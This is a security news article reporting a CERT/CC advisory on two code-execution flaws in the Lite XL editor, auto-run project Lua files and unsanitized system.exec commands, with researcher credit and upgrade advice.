CERT/CC Warns of Code Execution Flaws in Lite XL Text Editor (CVE-2025-12120, CVE-2025-12121)
Ddos 
The CERT Coordination Center (CERT/CC) has issued a vulnerability note highlighting two severe security flaws in Lite XL, a lightweight cross-platform text editor popular among developers for its Lua-based extensibility. The vulnerabilities — CVE-2025-12120 and CVE-2025-12121 — could allow attackers to execute arbitrary code on affected systems simply by opening a malicious project or triggering unsafe shell commands.
The first vulnerability, CVE-2025-12120, stems from Lite XL’s automatic execution of .lite_project.lua files whenever a user opens a project directory. While these files are designed for project-specific configuration, they can contain arbitrary Lua code, giving threat actors a direct path to execute malicious scripts if a developer unknowingly opens a compromised repository.
This behavior could easily be abused in software supply-chain attacks, particularly through shared codebases, Git repositories, or collaborative projects.
“The .lite_project.lua file is intended for project-specific configuration but can contain executable Lua logic. This behavior could allow execution of untrusted Lua code if a user opens a malicious project, potentially leading to arbitrary code execution with the privileges of the Lite XL process,” CERT/CC noted.
This flaw is particularly dangerous for developers working with open-source or third-party code, as it requires no user interaction beyond opening a folder in the editor.
The second vulnerability, CVE-2025-12121, involves improper sanitization in the system.exec function, which is used across multiple components of Lite XL, including core.lua, rootview.lua, and the treeview plugin.
“Lite XL versions 2.1.8 and prior contain a vulnerability in the system.exec function, which allowed arbitrary command execution through unsanitized shell command construction,” the note explained.
Because this function could be influenced by user-controlled input, attackers might exploit it to execute arbitrary shell commands with the same privileges as the editor process.
Both vulnerabilities open critical pathways for remote code execution (RCE). In the case of CVE-2025-12120, simply opening a malicious project directory could trigger hidden Lua payloads. For CVE-2025-12121, exploitation could occur via unsafe handling of system commands within the editor’s plugins and scripting interfaces.
The vulnerabilities were responsibly disclosed by Dogus Demirkiran, who was credited by both the Lite XL maintainers and CERT/CC for identifying and reporting the issues.
According to CERT/CC, both vulnerabilities affect Lite XL versions 2.1.8 and earlier, and users are strongly advised to upgrade to the latest release that includes fixes from pull requests #1472 and #1473 on GitHub.
Donate